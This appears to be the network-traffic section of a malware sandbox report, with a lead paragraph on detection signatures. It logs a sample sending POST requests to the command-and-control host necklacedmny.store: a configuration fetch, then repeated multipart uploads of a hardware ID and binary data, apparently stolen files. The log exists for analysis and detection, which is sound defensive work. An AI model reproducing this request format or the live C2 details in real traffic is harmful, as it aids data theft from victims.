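The path /api and a Chrome User-Agent are both too common to alert on alone; the act= verb together with the lid=/ver= pair is what carries the signal, and the report's Suricata hits on this traffic will be keyed on the same body fields. The large reply to act=recive_message is not decoded here: the report's "Found malware configuration" signature indicates the sandbox recovered it, but the page does not show the algorithm.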


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:01 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: necklacedmny.store
2024-10-30 01:27:01 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-30 01:27:01 UTC | 1017 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=af34dma0ovfcnp8j6kjuh2dm81; expires=Sat, 22 Feb 2025 19:13:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onEGI7SXQrGzRXCuckSz5th81r3AbfPn3%2FG92WFUwEaVfWwXiiabJg3cQUSjeDsFpWQfH6rrKd%2FggX6j5eAzggwvP8B%2FqRJ%2FlUG6oXExjHWx765b9SzhfKx6hT%2FxaCajGR7Di6k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79edaa8b0e9a4-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=1775597&cwnd=251&unsent_bytes=0&cid=c493dd26b1f63f09&ts=474&x=0"
2024-10-30 01:27:01 UTC | 352 | IN | Data Raw: 31 64 39 36 0d 0a 51 4b 32 57 68 34 6e 51 58 78 75 36 61 6e 52 75 4a 63 35 36 6e 30 4d 6a 4d 6a 32 56 69 39 79 44 6e 4e 5a 68 78 46 44 64 6e 33 4d 37 6a 2b 43 6c 73 2b 52 7a 4f 63 6b 50 56 6c 52 52 76 41 2f 36 62 77 46 54 57 62 65 78 75 75 4c 77 70 51 54 6f 63 71 76 79 55 58 72 4c 39 2b 76 36 74 58 4d 35 33 78 4a 57 56 48 36 31 57 50 6f 74 41 51 67 66 38 4f 47 2b 34 76 43 30 41 4b 38 2f 72 66 4d 51 4b 4d 48 78 37 2b 79 7a 4f 33 72 57 42 78 45 4c 51 4b 38 51 38 53 70 4f 57 6c 43 33 70 2f 37 6d 35 76 52 62 35 68 32 34 36 78 49 4e 7a 4f 58 73 71 36 31 7a 59 4a 67 50 47 6b 77 66 37 42 76 36 49 55 39 55 57 66 37 6a 74 4f 76 34 74 51 57 75 49 4c 54 35 47 79 6a 50 38 75 37 6d 75 69 39 33 33 41 41 61 44 55 71 76 57 4c 4e 68 52 6b 67 66 72 36 6e 74 30 2f 32 6c 45
Data Ascii: 1d96QK2Wh4nQXxu6anRuJc56n0MjMj2Vi9yDnNZhxFDdn3M7j+Cls+RzOckPVlRRvA/6bwFTWbexuuLwpQTocqvyUXrL9+v6tXM53xJWVH61WPotAQgf8OG+4vC0AK8/rfMQKMHx7+yzO3rWBxELQK8Q8SpOWlC3p/7m5vRb5h246xINzOXsq61zYJgPGkwf7Bv6IU9UWf7jtOv4tQWuILT5GyjP8u7mui933AAaDUqvWLNhRkgfr6nt0/2lE
2024-10-30 01:27:01 UTC | 1369 | IN | Data Raw: 76 71 76 7a 31 72 30 41 4d 64 43 56 57 6e 45 66 41 73 51 56 31 56 2b 4f 71 2b 35 76 53 2b 44 4b 77 32 73 76 41 58 49 73 2b 30 71 36 75 31 4a 54 6d 41 53 44 55 4a 56 36 73 55 36 32 4e 37 45 45 43 35 38 50 37 6d 38 76 52 62 35 6a 71 36 2f 68 49 70 77 50 66 74 34 4b 41 39 61 39 34 46 45 78 35 42 71 52 62 33 49 6c 4e 61 55 66 48 71 74 2b 72 33 73 51 53 69 63 76 47 39 46 6a 71 50 72 4b 58 4b 76 7a 5a 31 30 68 38 57 54 46 6a 69 41 62 30 6d 54 52 41 48 74 2b 32 2f 35 66 2b 77 44 61 67 32 73 2f 73 66 4c 38 44 79 37 2b 75 31 4e 33 48 51 43 52 73 48 53 4b 77 64 38 43 56 48 58 46 37 79 71 66 43 68 2b 61 78 44 2f 6e 4b 52 2b 68 49 77 6a 63 48 6d 35 62 77 36 62 35 67 58 57 42 55 48 71 78 53 39 65 51 46 65 57 76 6a 37 76 2f 50 37 75 68 47 71 4e 37 6e 77 45 69 7a 50 38
Data Ascii: vqvz1r0AMdCVWnEfAsQV1V+Oq+5vS+DKw2svAXIs+0q6u1JTmASDUJV6sU62N7EEC58P7m8vRb5jq6/hIpwPft4KA9a94FEx5BqRb3IlNaUfHqt+r3sQSicvG9FjqPrKXKvzZ10h8WTFjiAb0mTRAHt+2/5f+wDag2s/sfL8Dy7+u1N3HQCRsHSKwd8CVHXF7yqfCh+axD/nKR+hIwjcHm5bw6b5gXWBUHqxS9eQFeWvj7v/P7uhGqN7nwEizP8
2024-10-30 01:27:01 UTC | 1369 | IN | Data Raw: 36 62 35 67 58 57 42 55 48 71 78 53 39 65 51 46 63 56 76 66 69 74 4f 58 2b 73 77 36 6a 4d 62 6a 2b 48 43 58 46 2b 75 4c 76 76 6a 52 30 33 67 67 52 43 45 4b 2b 48 66 51 74 54 52 41 52 74 2b 36 6d 6f 61 62 30 4c 4b 45 6b 76 4e 49 53 4d 38 61 30 2b 71 57 72 66 58 37 55 53 45 35 4d 51 4b 6b 51 39 69 64 4a 55 45 33 79 35 37 58 67 39 4c 49 43 71 7a 36 35 2f 52 41 69 79 66 6a 6c 37 4c 55 76 61 39 30 4f 42 41 59 48 34 6c 6a 36 4f 51 45 49 48 38 48 35 71 66 44 6f 39 6a 61 6c 50 4c 48 36 42 32 4c 51 75 76 79 72 74 54 45 35 67 45 67 64 44 45 75 72 45 50 73 6c 53 56 39 51 2f 76 75 2f 37 66 43 6d 42 4b 59 37 73 66 49 64 4b 38 4c 7a 36 4f 43 34 4d 48 33 66 43 56 5a 43 42 36 73 41 76 58 6b 42 5a 6b 2f 36 35 5a 44 71 38 72 31 44 75 58 79 6d 76 52 59 75 6a 36 79 6c 37 37
Data Ascii: 6b5gXWBUHqxS9eQFcVvfitOX+sw6jMbj+HCXF+uLvvjR03ggRCEK+HfQtTRARt+6moab0LKEkvNISM8a0+qWrfX7USE5MQKkQ9idJUE3y57Xg9LICqz65/RAiyfjl7LUva90OBAYH4lj6OQEIH8H5qfDo9jalPLH6B2LQuvyrtTE5gEgdDEurEPslSV9Q/vu/7fCmBKY7sfIdK8Lz6OC4MH3fCVZCB6sAvXkBZk/65ZDq8r1DuXymvRYuj6yl77
2024-10-30 01:27:01 UTC | 1369 | IN | Data Raw: 44 42 4d 4a 51 36 73 63 2b 79 34 42 48 68 2f 77 38 66 36 35 76 70 73 6b 6b 33 43 65 78 31 45 39 67 65 32 6c 37 4c 35 39 49 5a 67 45 46 51 42 50 6f 78 37 30 4c 55 74 5a 56 50 76 69 75 75 33 33 73 51 57 6e 4e 37 72 38 46 53 37 46 38 75 62 6f 76 54 4a 32 30 45 68 59 54 45 43 30 57 4b 56 68 5a 45 64 55 2b 65 2f 2b 2f 72 43 74 51 36 45 2b 2f 36 56 52 4c 73 62 79 34 2b 36 2b 50 48 2f 51 44 52 34 49 52 71 6f 65 2f 69 35 46 56 56 37 34 37 62 4c 76 39 4c 55 43 71 6a 6d 77 39 68 52 69 67 62 54 69 38 2f 4a 6c 4f 65 6b 4c 41 42 74 58 6f 46 6a 69 62 31 67 51 57 50 75 70 35 71 48 2f 70 67 6d 73 50 4c 72 79 46 43 48 41 38 2b 6a 74 76 6a 64 77 30 41 34 5a 42 56 57 76 46 50 4d 6d 54 31 78 52 2b 75 4f 39 37 4c 37 36 51 36 45 71 2f 36 56 52 44 73 6a 35 79 2b 43 2b 4f 6a 6e
Data Ascii: DBMJQ6sc+y4BHh/w8f65vpskk3Cex1E9ge2l7L59IZgEFQBPox70LUtZVPviuu33sQWnN7r8FS7F8ubovTJ20EhYTEC0WKVhZEdU+e/+/rCtQ6E+/6VRLsby4+6+PH/QDR4IRqoe/i5FVV747bLv9LUCqjmw9hRigbTi8/JlOekLABtXoFjib1gQWPup5qH/pgmsPLryFCHA8+jtvjdw0A4ZBVWvFPMmT1xR+uO97L76Q6Eq/6VRDsj5y+C+Ojn
2024-10-30 01:27:01 UTC | 1369 | IN | Data Raw: 41 6e 73 48 2b 56 68 47 52 42 70 38 50 6d 75 34 72 79 46 46 61 55 6b 74 50 41 64 59 74 43 36 2f 4b 75 31 4d 54 6d 41 53 42 41 44 54 71 38 58 2f 43 68 4e 58 56 72 2b 37 4c 2f 6e 2b 72 34 4a 70 6a 53 35 2f 42 51 6f 7a 50 58 76 34 72 55 31 66 74 73 61 56 6b 49 48 71 77 43 39 65 51 46 35 57 4f 58 6e 72 71 48 68 2b 68 72 6d 4e 62 4f 39 53 57 4c 4c 2f 75 72 76 74 54 46 2f 33 51 34 62 44 55 69 74 47 50 49 6c 53 6c 6c 5a 39 75 53 37 37 50 71 6d 43 61 30 39 73 2f 51 64 4c 34 2b 36 70 65 79 71 66 53 47 59 4f 52 73 43 53 61 73 4f 76 54 34 50 53 52 2f 77 35 66 36 35 76 72 55 50 71 54 47 77 2f 68 49 6a 78 65 62 33 35 37 73 31 66 4e 51 44 47 41 70 56 71 68 66 30 49 6b 4a 5a 57 50 2f 6c 74 4f 4c 35 39 45 33 6d 4e 61 65 39 53 57 4c 73 34 2f 58 6d 38 69 49 33 77 55 67 52
Data Ascii: AnsH+VhGRBp8Pmu4ryFFaUktPAdYtC6/Ku1MTmASBADTq8X/ChNXVr+7L/n+r4JpjS5/BQozPXv4rU1ftsaVkIHqwC9eQF5WOXnrqHh+hrmNbO9SWLL/urvtTF/3Q4bDUitGPIlSllZ9uS77PqmCa09s/QdL4+6peyqfSGYORsCSasOvT4PSR/w5f65vrUPqTGw/hIjxeb357s1fNQDGApVqhf0IkJZWP/ltOL59E3mNae9SWLs4/Xm8iI3wUgR
2024-10-30 01:27:01 UTC | 1369 | IN | Data Raw: 37 7a 4d 30 52 57 55 50 6a 67 74 2b 58 32 74 77 4f 69 4e 72 6a 34 45 69 37 45 38 2b 62 6b 74 6a 52 33 30 51 64 57 51 67 65 72 41 4c 31 35 41 58 46 45 39 4f 57 7a 6f 65 48 36 47 75 59 31 73 37 31 4a 59 73 50 36 34 4f 75 34 4f 33 33 64 44 68 77 4a 52 36 63 62 38 69 56 48 56 46 44 33 34 72 66 67 2b 4c 45 4a 72 54 53 79 2f 68 63 6b 6a 37 71 6c 37 4b 70 39 49 5a 67 6f 44 51 46 4c 71 31 6a 69 62 31 67 51 57 50 75 70 35 71 48 31 75 41 65 68 4d 72 4c 2b 47 53 66 4c 2f 75 44 72 75 69 39 78 32 41 38 45 48 6b 65 6c 48 66 45 69 51 56 52 5a 2f 75 2b 39 35 62 37 36 51 36 45 71 2f 36 56 52 44 38 50 7a 7a 4f 79 70 66 57 61 57 45 56 59 4c 53 2b 78 41 76 53 42 4b 57 6c 44 36 36 72 6a 69 39 62 45 4a 70 7a 57 33 38 41 4d 68 77 50 76 68 36 37 30 37 66 39 6b 48 45 41 74 4f 72
                                                  Data Ascii: 7zM0RWUPjgt+X2twOiNrj4Ei7E8+bktjR30QdWQgerAL15AXFE9OWzoeH6GuY1s71JYsP64Ou4O33dDhwJR6cb8iVHVFD34rfg+LEJrTSy/hckj7ql7Kp9IZgoDQFLq1jib1gQWPup5qH1uAehMrL+GSfL/uDrui9x2A8EHkelHfEiQVRZ/u+95b76Q6Eq/6VRD8PzzOypfWaWEVYLS+xAvSBKWlD66rji9bEJpzW38AMhwPvh6707f9kHEAtOr
                                                  2024-10-30 01:27:01 UTC385INData Raw: 47 62 6d 48 51 2f 37 54 6d 37 72 4d 55 71 58 4c 78 76 52 35 69 6c 38 32 6c 34 72 55 6d 61 4d 34 46 42 67 73 48 6b 31 61 39 4f 51 45 49 48 38 4c 71 73 4f 2f 35 6f 68 4c 72 46 61 6e 33 46 6a 4c 49 34 2b 71 72 2f 48 31 2f 6d 46 42 46 51 67 65 6f 43 62 31 35 45 51 49 45 6f 72 72 70 73 61 79 72 54 62 39 79 71 62 31 4a 63 49 47 30 39 36 76 71 66 54 37 62 47 67 51 4b 52 4c 6f 62 75 68 39 2f 64 30 58 36 37 36 6e 77 77 49 6f 45 76 44 2b 35 36 67 42 75 32 76 66 72 35 62 55 72 4f 5a 5a 49 47 55 77 66 6c 56 69 31 59 58 34 65 48 2b 2b 70 35 71 48 4c 74 77 32 6f 4e 61 6e 73 58 41 58 56 2b 65 50 38 6f 33 30 33 6d 41 35 57 56 42 66 69 57 50 6b 77 41 51 67 50 70 62 4c 72 73 71 6e 6b 55 62 6c 38 70 72 30 48 59 70 65 6d 71 36 75 67 66 53 47 59 54 78 55 65 56 61 6f 62 36 79
                                                  Data Ascii: GbmHQ/7Tm7rMUqXLxvR5il82l4rUmaM4FBgsHk1a9OQEIH8LqsO/5ohLrFan3FjLI4+qr/H1/mFBFQgeoCb15EQIEorrpsayrTb9yqb1JcIG096vqfT7bGgQKRLobuh9/d0X676nwwIoEvD+56gBu2vfr5bUrOZZIGUwflVi1YX4eH++p5qHLtw2oNansXAXV+eP8o303mA5WVBfiWPkwAQgPpbLrsqnkUbl8pr0HYpemq6ugfSGYTxUeVaob6y
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 32 36 64 36 0d 0a 39 43 52 6c 4c 34 34 72 2f 66 77 4a 6f 4f 70 7a 47 78 76 79 41 30 77 75 54 6d 37 72 55 44 52 39 59 50 41 67 74 4a 71 68 69 39 62 77 46 66 48 36 2f 51 2f 71 6d 2b 69 30 33 6d 4b 76 2b 6c 55 52 66 4d 2b 75 76 73 70 43 77 30 2b 78 34 62 41 30 79 74 57 4c 4e 68 52 78 41 48 70 36 66 2b 35 65 2f 30 57 2f 5a 67 35 4b 68 43 64 5a 2b 6d 2b 71 57 72 66 57 2b 59 55 45 52 43 42 37 35 59 70 57 45 47 58 6c 4c 32 36 72 44 69 37 4b 59 46 70 53 53 38 75 69 38 63 37 76 6e 75 35 37 38 79 63 75 59 32 4e 77 46 4d 6f 42 58 79 4b 6e 39 75 53 76 54 6e 73 4f 62 6f 70 55 50 6f 63 72 43 39 53 52 75 50 76 4b 58 55 2f 48 31 68 6d 46 42 57 4f 55 53 69 46 76 6f 33 55 42 31 2b 2b 75 4b 79 37 50 47 2f 51 2b 68 79 75 62 31 4a 63 6f 47 30 34 66 72 79 5a 53 6d 4b 55 30 4e
                                                  Data Ascii: 26d69CRlL44r/fwJoOpzGxvyA0wuTm7rUDR9YPAgtJqhi9bwFfH6/Q/qm+i03mKv+lURfM+uvspCw0+x4bA0ytWLNhRxAHp6f+5e/0W/Zg5KhCdZ+m+qWrfW+YUERCB75YpWEGXlL26rDi7KYFpSS8ui8c7vnu578ycuY2NwFMoBXyKn9uSvTnsObopUPocrC9SRuPvKXU/H1hmFBWOUSiFvo3UB1++uKy7PG/Q+hyub1JcoG04fryZSmKU0N
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 50 73 6d 57 31 64 5a 30 63 6e 2b 72 37 36 37 51 2f 34 4c 2f 37 56 52 48 59 47 30 2f 61 76 71 66 55 7a 62 42 68 67 4c 55 62 31 56 32 44 5a 43 51 46 6e 30 71 66 43 68 2b 50 52 62 39 6e 7a 2f 2b 51 42 69 6c 36 53 33 73 4f 64 75 4c 6f 68 61 43 55 4a 65 37 41 36 39 65 52 4d 65 48 2b 57 70 35 71 47 35 74 78 47 30 4e 4c 7a 72 45 6d 58 78 79 73 50 6f 6f 7a 64 59 31 52 67 52 4d 6e 6d 35 47 2f 4d 76 52 6b 5a 4f 74 36 66 2b 37 72 37 73 4f 75 5a 36 38 2f 73 53 4e 49 2f 4c 71 36 75 71 66 53 47 59 50 52 55 43 53 61 73 4f 37 47 78 6e 55 30 37 39 79 4c 50 78 2b 66 52 4e 35 6a 54 2f 70 55 4a 73 6a 2f 44 30 71 2b 70 74 4b 34 4e 64 52 56 73 58 2f 67 65 7a 4f 41 46 47 48 36 2b 37 38 4b 48 73 39 46 76 6d 64 62 7a 76 41 79 54 4d 34 75 61 73 6a 41 4e 4d 32 77 59 59 43 31 47 5a
                                                  Data Ascii: PsmW1dZ0cn+r767Q/4L/7VRHYG0/avqfUzbBhgLUb1V2DZCQFn0qfCh+PRb9nz/+QBil6S3sOduLohaCUJe7A69eRMeH+Wp5qG5txG0NLzrEmXxysPoozdY1RgRMnm5G/MvRkZOt6f+7r7sOuZ68/sSNI/Lq6uqfSGYPRUCSasO7GxnU079yLPx+fRN5jT/pUJsj/D0q+ptK4NdRVsX/gezOAFGH6+78KHs9FvmdbzvAyTM4uasjANM2wYYC1GZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:02 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12840
Host: necklacedmny.store
2024-10-30 01:27:02 UTC | 12840 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

598349D07CD7E9A184B9DA78C53FAC6B
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-30 01:27:03 UTC | 1012 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p7nvsvdou9d1mftd46qjquefgj; expires=Sat, 22 Feb 2025 19:13:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cU0D2kWaadT4wH07bNAgCEAcQl5arcP9iR84BThD3YGzT9BbyBy1ml70qMvqZvDSWpk%2FRP0RDWZpC5debljAD8XutM8ALBNnF0ZEkAkkA2mrU6pivrnH3DHu9VVzuH1UDedYgw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79ee3698f6c81-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13782&delivery_rate=2344939&cwnd=251&unsent_bytes=0&cid=4b4d5d0a36e2d2cc&ts=556&x=0"
2024-10-30 01:27:03 UTC | 23 | IN | Data Ascii:
11
ok 173.254.250.78
2024-10-30 01:27:03 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:04 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15082
Host: necklacedmny.store
2024-10-30 01:27:04 UTC | 15082 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

598349D07CD7E9A184B9DA78C53FAC6B
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-30 01:27:04 UTC | 1022 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=oaleqfg3v840hn5d33thmv4nf2; expires=Sat, 22 Feb 2025 19:13:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6vIQeeUkWKEBU7i0c9mfN%2FCa4Jj4NZa1ZOMskHTcKAwRXZqm381DXoOBuAxLl%2F%2BgtmR%2FrcD9k%2F6wI6L1boVze1TuB4L%2BQPNZpsANDQQ3ueI8GuhNMHg02bfuejsTOodCerYPHNE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79eebbdf56b11-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2647166&cwnd=225&unsent_bytes=0&cid=97c41ce55404f516&ts=769&x=0"
2024-10-30 01:27:04 UTC | 23 | IN | Data Ascii:
11
ok 173.254.250.78
2024-10-30 01:27:04 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:05 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20572
Host: necklacedmny.store
2024-10-30 01:27:05 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

598349D07CD7E9A184B9DA78C53FAC6B
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-30 01:27:05 UTC | 5241 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:06 UTC | 1015 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vurdopak216f28e1f6plgpdpph; expires=Sat, 22 Feb 2025 19:13:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsOgIEWeUjFXTnBXzkfB5FwvLk1CJ48SqhPrwn%2Fjv9WjyQZMEuBZU3BE1AdE7kAt2lVeuB%2FNq4LQ3qhdSEBlfpQnoENvYoXu6gu0ZVXZXzdC40ntg4Pp6ipKc1zzpp2G9yBGk2Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79ef5cd7e6b88-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21536&delivery_rate=1473041&cwnd=251&unsent_bytes=0&cid=66be8515d2562efa&ts=747&x=0"
2024-10-30 01:27:06 UTC | 23 | IN | Data Ascii:
11
ok 173.254.250.78
2024-10-30 01:27:06 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:07 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1259
Host: necklacedmny.store
2024-10-30 01:27:07 UTC | 1259 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

598349D07CD7E9A184B9DA78C53FAC6B
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-30 01:27:08 UTC | 1018 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=up8l7ul07rqhalgvamcfq0e91t; expires=Sat, 22 Feb 2025 19:13:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NMrvYWT4dMSAwkMejdVniTKqoCpVhkggiOkbkc4XtcnaXekH5sPvsYpMexboySLLfma%2BFWf7zCWnETGDhR6FrZMMxQwFlOzAs%2FKIuAi%2BuvC2oEmIczEpr3wJAg2w%2BsaHOB%2FaF7M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79f00992b4650-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1091&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2178&delivery_rate=2666666&cwnd=251&unsent_bytes=0&cid=03d689498a5a092c&ts=480&x=0"
2024-10-30 01:27:08 UTC | 23 | IN | Data Ascii:
11
ok 173.254.250.78
2024-10-30 01:27:08 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49710 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:09 UTC | 285 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 570588
Host: necklacedmny.store
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

598349D07CD7E9A184B9DA78C53FAC6B
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
2024-10-30 01:27:09 UTC | 15331 | OUT | Data Ascii: (non-printable binary)
                                                  Data Ascii: Lb#M#fgjf+kh5>MQ6SLU-gQ{>b?<H3H_6vJ"`#)wpNQnmPZ)|.tm9t vKjl@B/2zUu;vdv)*pDURkg~D,f9o)m"1SQTm8$E/A
